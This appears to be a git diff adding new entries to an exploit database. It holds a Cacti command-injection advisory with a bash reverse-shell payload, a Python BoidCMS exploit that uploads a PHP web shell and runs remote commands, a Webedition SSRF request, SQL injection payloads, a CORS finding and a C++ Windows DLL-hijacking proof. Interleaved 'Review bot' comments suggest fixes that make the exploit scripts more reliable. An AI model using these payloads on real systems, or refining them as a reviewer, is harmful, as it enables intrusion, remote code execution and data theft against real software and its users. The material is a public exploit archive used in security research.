+ - Ensure that the Device has Graphs with one or more templates of: + - "Net-SNMP - Combined SCSI Disk Bytes" + - "Net-SNMP - Combined SCSI Disk I/O" + - (Creating the Device from the template "Net-SNMP Device" will satisfy the Graphs prerequisite) + - In the "SNMP Options", for the "SNMP Community String" field, use a value like this: + public\' ; touch /tmp/m3ssap0 ; \' + - Click the "Create" button. + - Check under /tmp the presence of the created file. + +To obtain a reverse shell, a payload like the following can be used. + + public\' ; bash -c "exec bash -i &>/dev/tcp// <&1" ; \' + +A similar exploit can be used editing an existing Device, with the same prerequisites, and waiting for the poller to run. It could be necessary to change the content of the "Downed Device Detection" field under the "Availability/Reachability Options" section with an item that doesn't involve SNMP (because the malicious payload could break the interaction with the host). + +---------- +Root Cause +---------- + +A detailed root cause of the vulnerability is available in the original security advisory (https://github.com/Cacti/cacti/security/advisories/GHSA-g6ff-58cj-x3cp) or in my blog post (https://m3ssap0.github.io/articles/cacti_authenticated_command_injection_snmp.html). + +---------- +References +---------- + + - https://github.com/Cacti/cacti/security/advisories/GHSA-g6ff-58cj-x3cp + - https://m3ssap0.github.io/articles/cacti_authenticated_command_injection_snmp.html + - https://github.com/m3ssap0/cacti-rce-snmp-options-vulnerable-application \ No newline at end of file diff --git a/exploits/php/webapps/51741.py b/exploits/php/webapps/51741.py new file mode 100755 index 000000000..7af2a65e9 --- /dev/null +++ b/exploits/php/webapps/51741.py 
@@ -0,0 +1,64 @@
+#!/usr/bin/python3
+# Exploit Title: BoidCMS v2.0.0 - authenticated file upload vulnerability
+# Date: 08/21/2023
+# Exploit Author: 1337kid
+# Vendor Homepage: https://boidcms.github.io/#/
+# Software Link: https://boidcms.github.io/BoidCMS.zip
+# Version: <= 2.0.0
+# Tested on: Ubuntu
+# CVE : CVE-2023-38836
+
+import requests
+import re
+import argparse
+
+parser = argparse.ArgumentParser(description='Exploit for CVE-2023-38836')
+parser.add_argument("-u", "--url", help="website url")
+parser.add_argument("-l", "--user", help="admin username")
+parser.add_argument("-p", "--passwd", help="admin password")
+args = parser.parse_args()
+base_url=args.url
+user=args.user
+passwd=args.passwd
+
+def showhelp():
+ print(parser.print_help())
+ exit()
+if base_url == None: showhelp()
+elif user == None: showhelp()
+elif passwd == None: showhelp()
+
+with requests.Session() as s:
+ req=s.get(f'{base_url}/admin')
+ token=re.findall('[a-z0-9]{64}',req.text)
+ form_login_data={
+ "username":user,
+ "password":passwd,
+ "login":"Login",
+ }
+ form_login_data['token']=token
+ s.post(f'{base_url}/admin',data=form_login_data)
+ #=========== File upload to RCE
+ req=s.get(f'{base_url}/admin?page=media')
+ token=re.findall('[a-z0-9]{64}',req.text)
+ form_upld_data={
+ "token":token,
+ "upload":"Upload"
+ }
+ #==== php shell
+ php_code=['GIF89a;\n','']
+ with open('shell.php','w') as f:
+ f.writelines(php_code)
+ #====
+ file = {'file' : open('shell.php','rb')}
+ s.post(f'{base_url}/admin?page=media',files=file,data=form_upld_data)
+ req=s.get(f'{base_url}/media/shell.php')
+ if req.status_code == '404':
+ print("Upload failed")
+ exit()
+ print(f'Shell uploaded to "{base_url}/media/shell.php"')
+ while 1:
+ cmd=input("cmd >> ")
+ if cmd=='exit': exit()
+ req=s.get(f'{base_url}/media/shell.php',params = {"cmd": cmd})
+ print(req.text)
\ No newline at end of file
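Review bot: `if req.status_code == '404':` compares an `int` to a `str`, so the "Upload failed" branch can never run and the script enters the command loop regardless of whether the upload worked; it should read `if req.status_code == 404:`. `showhelp()` wraps `parser.print_help()` in `print()`, which emits a trailing `None` line after the usage text — call `parser.print_help()` on its own. The handle opened by `open('shell.php','rb')` for the `files=` argument is never closed; a `with open('shell.php', 'rb') as fh:` block around the post, matching the one already used to write the file, would release it. `exit()` is the site-module helper; `sys.exit()` (or `raise SystemExit`) is the portable form for scripts.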
diff --git a/exploits/php/webapps/51743.txt b/exploits/php/webapps/51743.txt
new file mode 100644
index 000000000..54ecbc147
--- /dev/null
+++ b/exploits/php/webapps/51743.txt
@@ -0,0 +1,39 @@
+Exploit Title: Webedition CMS v2.9.8.8 - Blind SSRF
+Application: Webedition CMS
+Version: v2.9.8.8
+Bugs: Blind SSRF
+Technology: PHP
+Vendor URL: https://www.webedition.org/
+Software Link: https://download.webedition.org/releases/OnlineInstaller.tgz?p=1
+Date of found: 07.09.2023
+Author: Mirabbas Ağalarov
+Tested on: Linux
+
+
+2. Technical Details & POC
+========================================
+write https://youserver/test.xml to we_cmd[0] parameter
+
+poc request
+
+POST /webEdition/rpc.php?cmd=widgetGetRss&mod=rss HTTP/1.1
+Host: localhost
+Content-Length: 141
+sec-ch-ua:
+Accept: application/json, text/javascript, */*; q=0.01
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+sec-ch-ua-mobile: ?0
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
+sec-ch-ua-platform: ""
+Origin: http://localhost
+Sec-Fetch-Site: same-origin
+Sec-Fetch-Mode: cors
+Sec-Fetch-Dest: empty
+Referer: http://localhost/webEdition/index.php?we_cmd[0]=startWE
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Cookie: treewidth_main=300; WESESSION=41a9164e60666254199b3ea1cd3d2e0ad969c379; cookie=yep; treewidth_main=300
+Connection: close
+
+we_cmd[0]=https://YOU-SERVER/test.xml&we_cmd[1]=111000&we_cmd[2]=0&we_cmd[3]=110000&we_cmd[4]=&we_cmd[5]=m_3
\ No newline at end of file
diff --git a/exploits/php/webapps/51744.txt b/exploits/php/webapps/51744.txt
new file mode 100644
index 000000000..629b7048d
--- /dev/null
+++ b/exploits/php/webapps/51744.txt
@@ -0,0 +1,48 @@
+## Title: Limo Booking Software v1.0 - CORS
+## Author: nu11secur1ty
+## Date: 09/08/2023
+## Vendor: https://www.phpjabbers.com/
+## Software: https://www.phpjabbers.com/limo-booking-software/#sectionDemo
+## Reference: https://portswigger.net/web-security/cors
+
+## Description:
+The application implements an HTML5 cross-origin resource sharing
+(CORS) policy for this request that allows access from any domain.
+The application allowed access from the requested origin http://wioydcbiourl.com
+Since the Vary: Origin header was not present in the response, reverse
+proxies and intermediate servers may cache it. This may enable an
+attacker to carry out cache poisoning attacks. The attacker can get
+some of the software resources of the victim without the victim
+knowing this.
+
+STATUS: HIGH Vulnerability
+
+[+]Test Payload:
+```
+GET /1694201352_198/index.php?controller=pjFrontPublic&action=pjActionFleets&locale=1&index=2795
+HTTP/1.1
+Host: demo.phpjabbers.com
+Accept-Encoding: gzip, deflate
+Accept: */*
+Accept-Language: en-US;q=0.9,en;q=0.8
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
+AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.141
+Safari/537.36
+Connection: close
+Cache-Control: max-age=0
+Origin: http://wioydcbiourl.com
+Referer: http://demo.phpjabbers.com/
+Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="116", "Chromium";v="116"
+Sec-CH-UA-Platform: Windows
+Sec-CH-UA-Mobile: ?0
+
+```
+
+## Reproduce:
+[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/phpjabbers/2023/Limo-Booking-Software-1.0)
+
+## Proof and Exploit:
+[href](https://www.nu11secur1ty.com/2023/09/limo-booking-software-10-cors.html)
+
+## Time spent:
+00:35:00
\ No newline at end of file
diff --git a/exploits/php/webapps/51745.txt b/exploits/php/webapps/51745.txt
new file mode 100644
index 000000000..fc34b1e03
--- /dev/null
+++ b/exploits/php/webapps/51745.txt
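Review bot: The "Test Payload" shows only the request, while every claim in the description — that any origin is allowed and that `Vary: Origin` is absent — can only be verified from the response headers (`Access-Control-Allow-Origin`, `Access-Control-Allow-Credentials`, `Vary`), which are not included; the response should be added. The request carries no `Cookie` header and targets `pjFrontPublic`/`pjActionFleets`, which looks like a public, unauthenticated listing, so a permissive CORS policy on it exposes nothing that any origin could not already fetch directly; unless the response sets `Access-Control-Allow-Credentials: true` and the endpoint returns per-user data, the "HIGH" rating is not supported by what is shown. The cache-poisoning sentence likewise needs the response's caching headers as evidence.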
@@ -0,0 +1,75 @@ +## Title: Shuttle-Booking-Software v1.0 - Multiple-SQLi +## Author: nu11secur1ty +## Date: 09/10/2023 +## Vendor: https://www.phpjabbers.com/ +## Software: https://www.phpjabbers.com/shuttle-booking-software/#sectionPricing +## Reference: https://portswigger.net/web-security/sql-injection + +## Description: +The location_id parameter appears to be vulnerable to SQL injection +attacks. A single quote was submitted in the location_id parameter, +and a database error message was returned. Two single quotes were then +submitted and the error message disappeared. +The attacker easily can steal all information from the database of +this web application! +WARNING! All of you: Be careful what you buy! This will be your responsibility! + +STATUS: HIGH-CRITICAL Vulnerability + +[+]Payload: +```mysql +--- +Parameter: location_id (GET) + Type: boolean-based blind + Title: AND boolean-based blind - WHERE or HAVING clause + Payload: controller=pjFrontPublic&action=pjActionGetDropoffs&index=348&location_id=3''') +AND 1347=1347 AND ('MVss'='MVss&traveling=from + + Type: error-based + Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or +GROUP BY clause (GTID_SUBSET) + Payload: controller=pjFrontPublic&action=pjActionGetDropoffs&index=348&location_id=3''') +AND GTID_SUBSET(CONCAT(0x716b786a71,(SELECT +(ELT(9416=9416,1))),0x71706b7071),9416) AND +('dOqc'='dOqc&traveling=from + + Type: time-based blind + Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) + Payload: controller=pjFrontPublic&action=pjActionGetDropoffs&index=348&location_id=3''') +AND (SELECT 1087 FROM (SELECT(SLEEP(15)))poqp) AND +('EEYQ'='EEYQ&traveling=from +--- +``` + +## Reproduce: +[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/phpjabbers/2023/Shuttle-Booking-Software-1.0) + +## Proof and Exploit: +[href](https://www.nu11secur1ty.com/2023/09/shuttle-booking-software-10-multiple.html) + +## Time spent: +01:47:00 + + +-- +System Administrator - 
Infrastructure Engineer +Penetration Testing Engineer +Exploit developer at https://packetstormsecurity.com/ +https://cve.mitre.org/index.htmlhttps://cxsecurity.com/ and +https://www.exploit-db.com/ +0day Exploit DataBase https://0day.today/ +home page: https://www.nu11secur1ty.com/ +hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= + nu11secur1ty + + +-- +System Administrator - Infrastructure Engineer +Penetration Testing Engineer +Exploit developer at https://packetstormsecurity.com/ +https://cve.mitre.org/index.html +https://cxsecurity.com/ and https://www.exploit-db.com/ +0day Exploit DataBase https://0day.today/ +home page: https://www.nu11secur1ty.com/ +hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= + nu11secur1ty \ No newline at end of file diff --git a/exploits/windows/local/51733.txt b/exploits/windows/local/51733.txt new file mode 100644 index 000000000..1c0b388bb --- /dev/null +++ b/exploits/windows/local/51733.txt 
@@ -0,0 +1,230 @@ + #--------------------------------------------------------- +# Title: Microsoft Windows 11 - 'apds.dll' DLL hijacking (Forced) +# Date: 2023-09-01 +# Author: Moein Shahabi +# Vendor: https://www.microsoft.com +# Version: Windows 11 Pro 10.0.22621 +# Tested on: Windows 11_x64 [eng] + +#--------------------------------------------------------- + + +Description: + +HelpPane object allows us to force Windows 11 to DLL hijacking + +Instructions: + +1. Compile dll +2. Copy newly compiled dll "apds.dll" in the "C:\Windows\" directory +3. Launch cmd and Execute the following command to test HelpPane object "[System.Activator]::CreateInstance([Type]::GetTypeFromCLSID('8CEC58AE-07A1-11D9-B15E-000D56BFE6EE'))" +4. Boom DLL Hijacked! + + +------Code_Poc------- +#pragma once +#include + + + +// Function executed when the thread starts +extern "C" __declspec(dllexport) +DWORD WINAPI MessageBoxThread(LPVOID lpParam) { +    MessageBox(NULL, L"DLL Hijacked!", L"DLL Hijacked!", NULL); +    return 0; +} + +PBYTE AllocateUsableMemory(PBYTE baseAddress, DWORD size, DWORD protection = PAGE_READWRITE) { +#ifdef _WIN64 +    PIMAGE_DOS_HEADER dosHeader = (PIMAGE_DOS_HEADER)baseAddress; +    PIMAGE_NT_HEADERS ntHeaders = (PIMAGE_NT_HEADERS)((PBYTE)dosHeader + dosHeader->e_lfanew); +    PIMAGE_OPTIONAL_HEADER optionalHeader = &ntHeaders->OptionalHeader; + +    // Create some breathing room +    baseAddress = baseAddress + optionalHeader->SizeOfImage; + +    for (PBYTE offset = baseAddress; offset < baseAddress + MAXDWORD; offset += 1024 * 8) { +        PBYTE usuable = (PBYTE)VirtualAlloc( +            offset, +            size, +            MEM_RESERVE | MEM_COMMIT, +            protection); + +        if (usuable) { +            ZeroMemory(usuable, size); // Not sure if this is required +            return usuable; +        } +    } +#else +    // x86 doesn't matter where we allocate + +    PBYTE usuable = (PBYTE)VirtualAlloc( +        NULL, +        size, +        
MEM_RESERVE | MEM_COMMIT, +        protection); + +    if (usuable) { +        ZeroMemory(usuable, size); +        return usuable; +    } +#endif +    return 0; +} + +BOOL ProxyExports(HMODULE ourBase, HMODULE targetBase) +{ +#ifdef _WIN64 +    BYTE jmpPrefix[] = { 0x48, 0xb8 }; // Mov Rax +    BYTE jmpSuffix[] = { 0xff, 0xe0 }; // Jmp Rax +#else +    BYTE jmpPrefix[] = { 0xb8 }; // Mov Eax +    BYTE jmpSuffix[] = { 0xff, 0xe0 }; // Jmp Eax +#endif + +    PIMAGE_DOS_HEADER dosHeader = (PIMAGE_DOS_HEADER)targetBase; +    PIMAGE_NT_HEADERS ntHeaders = (PIMAGE_NT_HEADERS)((PBYTE)dosHeader + dosHeader->e_lfanew); +    PIMAGE_OPTIONAL_HEADER optionalHeader = &ntHeaders->OptionalHeader; +    PIMAGE_DATA_DIRECTORY exportDataDirectory = &optionalHeader->DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT]; +    if (exportDataDirectory->Size == 0) +        return FALSE; // Nothing to forward + +    PIMAGE_EXPORT_DIRECTORY targetExportDirectory = (PIMAGE_EXPORT_DIRECTORY)((PBYTE)dosHeader + exportDataDirectory->VirtualAddress); + +    if (targetExportDirectory->NumberOfFunctions != targetExportDirectory->NumberOfNames) +        return FALSE; // TODO: Add support for DLLs with mixed ordinals + +    dosHeader = (PIMAGE_DOS_HEADER)ourBase; +    ntHeaders = (PIMAGE_NT_HEADERS)((PBYTE)dosHeader + dosHeader->e_lfanew); +    optionalHeader = &ntHeaders->OptionalHeader; +    exportDataDirectory = &optionalHeader->DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT]; +    if (exportDataDirectory->Size == 0) +        return FALSE; // Our DLL is broken + +    PIMAGE_EXPORT_DIRECTORY ourExportDirectory = (PIMAGE_EXPORT_DIRECTORY)((PBYTE)dosHeader + exportDataDirectory->VirtualAddress); + +    // ---------------------------------- + +    // Make current header data RW for redirections +    DWORD oldProtect = 0; +    if (!VirtualProtect( +        ourExportDirectory, +        64, PAGE_READWRITE, +        &oldProtect)) { +        return FALSE; +    } + +    DWORD totalAllocationSize = 0; + +    // Add the 
size of jumps +    totalAllocationSize += targetExportDirectory->NumberOfFunctions * (sizeof(jmpPrefix) + sizeof(jmpSuffix) + sizeof(LPVOID)); + +    // Add the size of function table +    totalAllocationSize += targetExportDirectory->NumberOfFunctions * sizeof(INT); + +    // Add total size of names +    PINT targetAddressOfNames = (PINT)((PBYTE)targetBase + targetExportDirectory->AddressOfNames); +    for (DWORD i = 0; i < targetExportDirectory->NumberOfNames; i++) +        totalAllocationSize += (DWORD)strlen(((LPCSTR)((PBYTE)targetBase + targetAddressOfNames[i]))) + 1; + +    // Add size of name table +    totalAllocationSize += targetExportDirectory->NumberOfNames * sizeof(INT); + +    // Add the size of ordinals: +    totalAllocationSize += targetExportDirectory->NumberOfFunctions * sizeof(USHORT); + +    // Allocate usuable memory for rebuilt export data +    PBYTE exportData = AllocateUsableMemory((PBYTE)ourBase, totalAllocationSize, PAGE_READWRITE); +    if (!exportData) +        return FALSE; + +    PBYTE sideAllocation = exportData; // Used for VirtualProtect later + +    // Copy Function Table +    PINT newFunctionTable = (PINT)exportData; +    CopyMemory(newFunctionTable, (PBYTE)targetBase + targetExportDirectory->AddressOfNames, targetExportDirectory->NumberOfFunctions * sizeof(INT)); +    exportData += targetExportDirectory->NumberOfFunctions * sizeof(INT); +    ourExportDirectory->AddressOfFunctions = (DWORD)((PBYTE)newFunctionTable - (PBYTE)ourBase); + +    // Write JMPs and update RVAs in the new function table +    PINT targetAddressOfFunctions = (PINT)((PBYTE)targetBase + targetExportDirectory->AddressOfFunctions); +    for (DWORD i = 0; i < targetExportDirectory->NumberOfFunctions; i++) { +        newFunctionTable[i] = (DWORD)(exportData - (PBYTE)ourBase); + +        CopyMemory(exportData, jmpPrefix, sizeof(jmpPrefix)); +        exportData += sizeof(jmpPrefix); + +        PBYTE realAddress = (PBYTE)((PBYTE)targetBase + 
targetAddressOfFunctions[i]); +        CopyMemory(exportData, &realAddress, sizeof(LPVOID)); +        exportData += sizeof(LPVOID); + +        CopyMemory(exportData, jmpSuffix, sizeof(jmpSuffix)); +        exportData += sizeof(jmpSuffix); +    } + +    // Copy Name RVA Table +    PINT newNameTable = (PINT)exportData; +    CopyMemory(newNameTable, (PBYTE)targetBase + targetExportDirectory->AddressOfNames, targetExportDirectory->NumberOfNames * sizeof(DWORD)); +    exportData += targetExportDirectory->NumberOfNames * sizeof(DWORD); +    ourExportDirectory->AddressOfNames = (DWORD)((PBYTE)newNameTable - (PBYTE)ourBase); + +    // Copy names and apply delta to all the RVAs in the new name table +    for (DWORD i = 0; i < targetExportDirectory->NumberOfNames; i++) { +        PBYTE realAddress = (PBYTE)((PBYTE)targetBase + targetAddressOfNames[i]); +        DWORD length = (DWORD)strlen((LPCSTR)realAddress); +        CopyMemory(exportData, realAddress, length); +        newNameTable[i] = (DWORD)((PBYTE)exportData - (PBYTE)ourBase); +        exportData += length + 1; +    } + +    // Copy Ordinal Table +    PINT newOrdinalTable = (PINT)exportData; +    CopyMemory(newOrdinalTable, (PBYTE)targetBase + targetExportDirectory->AddressOfNameOrdinals, targetExportDirectory->NumberOfFunctions * sizeof(USHORT)); +    exportData += targetExportDirectory->NumberOfFunctions * sizeof(USHORT); +    ourExportDirectory->AddressOfNameOrdinals = (DWORD)((PBYTE)newOrdinalTable - (PBYTE)ourBase); + +    // Set our counts straight +    ourExportDirectory->NumberOfFunctions = targetExportDirectory->NumberOfFunctions; +    ourExportDirectory->NumberOfNames = targetExportDirectory->NumberOfNames; + +    if (!VirtualProtect( +        ourExportDirectory, +        64, oldProtect, +        &oldProtect)) { +        return FALSE; +    } + +    if (!VirtualProtect( +        sideAllocation, +        totalAllocationSize, +        PAGE_EXECUTE_READ, +        &oldProtect)) { +        return FALSE; +    } + 
+    return TRUE; +} +// Executed when the DLL is loaded (traditionally or through reflective injection) +BOOL APIENTRY DllMain(HMODULE hModule, +    DWORD  ul_reason_for_call, +    LPVOID lpReserved +) +{ +    HMODULE realDLL; +    switch (ul_reason_for_call) +    { +    case DLL_PROCESS_ATTACH: +        CreateThread(NULL, NULL, MessageBoxThread, NULL, NULL, NULL); +        realDLL = LoadLibrary(L"C:\\Windows\\System32\\apds.dll"); +        if (realDLL) +            ProxyExports(hModule, realDLL); + + +    case DLL_THREAD_ATTACH: +    case DLL_THREAD_DETACH: +    case DLL_PROCESS_DETACH: +        break; +    } +    return TRUE; +} +-------------------------- \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index df321cd7d..45c57e219 100644 --- a/files_exploits.csv +++ b/files_exploits.csv 
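Review bot: Step 2 of the instructions copies the compiled DLL into `C:\Windows\`, which on a default install requires administrative rights, yet neither the header nor the description says what privilege the attacker starts with or what is gained when the HelpPane object loads it; the advisory should state the boundary crossed, because an admin-only file write that yields execution in the same user's context is not a privilege escalation. In `DllMain`, the `DLL_PROCESS_ATTACH` case has no `break` and falls through into `DLL_THREAD_ATTACH`; it is harmless as written because the next statement is `break;`, but an explicit `break;` after the `ProxyExports` call makes the intent clear. Creating a thread and calling `LoadLibrary` inside `DLL_PROCESS_ATTACH` runs under the loader lock, which the platform documentation advises against and which can deadlock depending on the host process; a comment noting that limitation would help readers. `ProxyExports` also copies from `AddressOfNames` into `newFunctionTable` under the "Copy Function Table" comment; the values are overwritten by the following loop, so either the comment or the source offset should be corrected.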
@@ -2901,6 +2901,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 46508,exploits/freebsd_x86-64/local/46508.rb,"FreeBSD - Intel SYSRET Privilege Escalation (Metasploit)",2019-03-07,Metasploit,local,freebsd_x86-64,,2019-03-07,2019-03-07,1,CVE-2012-0217,"Metasploit Framework (MSF)",,,,https://raw.githubusercontent.com/rapid7/metasploit-framework/468679f9074ee4a7de7624d3440ff6e7f65cf9c2/modules/exploits/freebsd/local/intel_sysret_priv_esc.rb
 46508,exploits/freebsd_x86-64/local/46508.rb,"FreeBSD - Intel SYSRET Privilege Escalation (Metasploit)",2019-03-07,Metasploit,local,freebsd_x86-64,,2019-03-07,2019-03-07,1,CVE-2012-0217,Local,,,,https://raw.githubusercontent.com/rapid7/metasploit-framework/468679f9074ee4a7de7624d3440ff6e7f65cf9c2/modules/exploits/freebsd/local/intel_sysret_priv_esc.rb
 51257,exploits/go/webapps/51257.py,"Answerdev 1.0.3 - Account Takeover",2023-04-05,"Eduardo Pérez-Malumbres Cervera",webapps,go,,2023-04-05,2023-04-27,1,CVE-2023-0744,,,,,
+51734,exploits/go/webapps/51734.py,"Minio 2022-07-29T19-40-48Z - Path traversal",2023-10-09,"Jenson Zhao",webapps,go,,2023-10-09,2023-10-09,0,CVE-2022-35919,,,,,
 51497,exploits/go/webapps/51497.txt,"Pydio Cells 4.1.2 - Cross-Site Scripting (XSS) via File Download",2023-05-31,"RedTeam Pentesting GmbH",webapps,go,,2023-05-31,2023-05-31,0,CVE-2023-32751,,,,,
 51498,exploits/go/webapps/51498.txt,"Pydio Cells 4.1.2 - Server-Side Request Forgery",2023-05-31,"RedTeam Pentesting GmbH",webapps,go,,2023-05-31,2023-05-31,0,CVE-2023-32750,,,,,
 51496,exploits/go/webapps/51496.txt,"Pydio Cells 4.1.2 - Unauthorised Role Assignments",2023-05-31,"RedTeam Pentesting GmbH",webapps,go,,2023-05-31,2023-05-31,0,CVE-2023-32749,,,,,
@@ -3206,6 +3207,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 4319,exploits/hardware/dos/4319.pl,"Thomson SpeedTouch ST 2030 (SIP Phone) - Remote Denial of Service",2007-08-27,MADYNES,dos,hardware,,2007-08-26,2016-10-27,1,CVE-2007-4553,,,,,
 30530,exploits/hardware/dos/30530.pl,"Thomson SpeedTouch ST 2030 (SIP Phone) - SIP Invite Message Remote Denial of Service",2007-08-27,"Humberto J. Abdelnur",dos,hardware,,2007-08-27,2016-10-27,1,CVE-2007-4553;OSVDB-39850,,,,,https://www.securityfocus.com/bid/25446/info
 25124,exploits/hardware/dos/25124.txt,"Thomson TCW690 Cable Modem ST42.03.0a - GET Denial of Service",2005-02-19,MurDoK,dos,hardware,,2005-02-19,2013-05-01,1,CVE-2003-1085;OSVDB-14022,,,,,https://www.securityfocus.com/bid/12595/info
+51730,exploits/hardware/dos/51730.txt,"Tinycontrol LAN Controller v3 (LK3) 1.58a - Remote Denial Of Service",2023-10-09,LiquidWorm,dos,hardware,,2023-10-09,2023-10-09,0,,,,,,
 11043,exploits/hardware/dos/11043.txt,"Total MultiMedia Features - Sony Ericsson Phones Denial of Service (PoC)",2010-01-06,Aodrulez,dos,hardware,,2010-01-05,,0,,,Sony_Ericsson.rar,,,
 48255,exploits/hardware/dos/48255.py,"TP-Link Archer C50 3 - Denial of Service (PoC)",2020-03-26,thewhiteh4t,dos,hardware,,2020-03-26,2020-03-26,0,CVE-2020-9375,,,,,
 40910,exploits/hardware/dos/40910.txt,"TP-LINK TD-W8151N - Denial of Service",2016-12-13,"Persian Hack Team",dos,hardware,,2016-12-13,2016-12-13,0,,,,,,
@@ -3337,6 +3339,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 44176,exploits/hardware/remote/44176.rb,"AsusWRT LAN - Remote Code Execution (Metasploit)",2018-02-26,Metasploit,remote,hardware,9999,2018-02-26,2018-02-26,1,CVE-2018-6000;CVE-2018-5999,"Metasploit Framework (MSF)",,,,https://raw.githubusercontent.com/rapid7/metasploit-framework/4b8a8fa2b197686d91414099d1ac90f80bfd71ba/modules/exploits/linux/http/asuswrt_lan_rce.rb
 44176,exploits/hardware/remote/44176.rb,"AsusWRT LAN - Remote Code Execution (Metasploit)",2018-02-26,Metasploit,remote,hardware,9999,2018-02-26,2018-02-26,1,CVE-2018-6000;CVE-2018-5999,Remote,,,,https://raw.githubusercontent.com/rapid7/metasploit-framework/4b8a8fa2b197686d91414099d1ac90f80bfd71ba/modules/exploits/linux/http/asuswrt_lan_rce.rb
 43881,exploits/hardware/remote/43881.txt,"AsusWRT Router < 3.0.0.4.380.7743 - LAN Remote Code Execution",2018-01-22,"Pedro Ribeiro",remote,hardware,,2018-01-25,2018-01-25,0,CVE-2018-6000;CVE-2018-5999,,,,,https://github.com/pedrib/PoC/blob/787b92c549c7a8ddd53740ef0fbc1e04c12a18b6/advisories/asuswrt-lan-rce.txt
+51742,exploits/hardware/remote/51742.txt,"Atcom 2.7.x.x - Authenticated Command Injection",2023-10-09,"Mohammed Adel",remote,hardware,,2023-10-09,2023-10-09,0,,,,,,
 50565,exploits/hardware/remote/50565.txt,"Auerswald COMfortel 2.8F - Authentication Bypass",2021-12-06,"RedTeam Pentesting GmbH",remote,hardware,,2021-12-06,2021-12-06,0,,,,,,
 50568,exploits/hardware/remote/50568.txt,"Auerswald COMpact 8.0B - Arbitrary File Disclosure",2021-12-06,"RedTeam Pentesting GmbH",remote,hardware,,2021-12-06,2021-12-06,0,,,,,,
 50569,exploits/hardware/remote/50569.txt,"Auerswald COMpact 8.0B - Multiple Backdoors",2021-12-06,"RedTeam Pentesting GmbH",remote,hardware,,2021-12-06,2022-01-05,0,CVE-2021-40859,,,,,
@@ -3862,6 +3865,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 24892,exploits/hardware/remote/24892.txt,"Rosewill RSVA11001 - Remote Command Injection",2013-03-26,"Eric Urban",remote,hardware,,2013-03-26,2013-03-26,0,OSVDB-91630,,,,,
 51138,exploits/hardware/remote/51138.txt,"Router ZTE-H108NS - Authentication Bypass",2023-03-30,"George Tsimpidas",remote,hardware,,2023-03-30,2023-03-30,0,,,,,,
 18779,exploits/hardware/remote/18779.txt,"RuggedCom Devices - Backdoor Access",2012-04-24,jc,remote,hardware,,2012-04-24,2012-04-24,0,CVE-2012-2441;OSVDB-81406;CVE-2012-1803,,,,,
+51727,exploits/hardware/remote/51727.txt,"Ruijie Reyee Mesh Router - MITM Remote Code Execution (RCE)",2023-10-09,"Riyan Firmansyah of Seclab",remote,hardware,,2023-10-09,2023-10-09,0,,,,,,
 50930,exploits/hardware/remote/50930.py,"Ruijie Reyee Mesh Router - Remote Code Execution (RCE) (Authenticated)",2022-05-11,"Minh Khoa",remote,hardware,,2022-05-11,2022-05-11,0,CVE-2021-43164,,,,,
 35800,exploits/hardware/remote/35800.txt,"RXS-3211 IP Camera - UDP Packet Password Information Disclosure",2011-05-25,"Spare Clock Cycles",remote,hardware,,2011-05-25,2015-01-16,1,,,,,,https://www.securityfocus.com/bid/47976/info
 35997,exploits/hardware/remote/35997.sh,"Sagem F@st 3304 Routers - PPPoE Credentials Information Disclosure",2011-07-27,securititracker,remote,hardware,,2011-07-27,2015-02-06,1,,,,,,https://www.securityfocus.com/bid/48908/info
@@ -3942,6 +3946,8 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 9432,exploits/hardware/remote/9432.txt,"THOMSON ST585 - 'user.ini' Arbitrary Disclosure",2009-08-13,"aBo MoHaMeD",remote,hardware,,2009-08-12,,1,,,,,,
 829,exploits/hardware/remote/829.c,"Thomson TCW690 - POST Password Validation",2005-02-19,MurDoK,remote,hardware,80,2005-02-18,,1,OSVDB-14023;CVE-2005-0494,,,,,
 10362,exploits/hardware/remote/10362.txt,"THOMSON TG585n 7.4.3.2 - 'user.ini' Arbitrary Disclosure",2009-12-09,"AnTi SeCuRe",remote,hardware,,2009-12-08,,0,OSVDB-104795,,,,,
+51732,exploits/hardware/remote/51732.txt,"Tinycontrol LAN Controller v3 (LK3) 1.58a - Remote Admin Password Change",2023-10-09,LiquidWorm,remote,hardware,,2023-10-09,2023-10-09,0,,,,,,
+51731,exploits/hardware/remote/51731.py,"Tinycontrol LAN Controller v3 (LK3) 1.58a - Remote Credentials Extraction",2023-10-09,LiquidWorm,remote,hardware,,2023-10-09,2023-10-09,0,,,,,,
 40275,exploits/hardware/remote/40275.txt,"TOPSEC Firewalls - 'ELIGIBLEBACHELOR' Remote Command Execution",2016-08-19,"Shadow Brokers",remote,hardware,,2016-08-19,2017-11-22,0,,,,,,
 51677,exploits/hardware/remote/51677.py,"TP-Link Archer AX21 - Unauthenticated Command Injection",2023-08-10,Voyag3r,remote,hardware,,2023-08-10,2023-08-10,0,CVE-2023-1389,,,,,
 38186,exploits/hardware/remote/38186.txt,"TP-Link NC200/NC220 Cloud Camera 300Mbps Wi-Fi - Hard-Coded Credentials",2015-09-15,LiquidWorm,remote,hardware,,2015-09-15,2015-09-15,0,OSVDB-127536,,,,,http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5255.php
@@ -9870,6 +9876,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
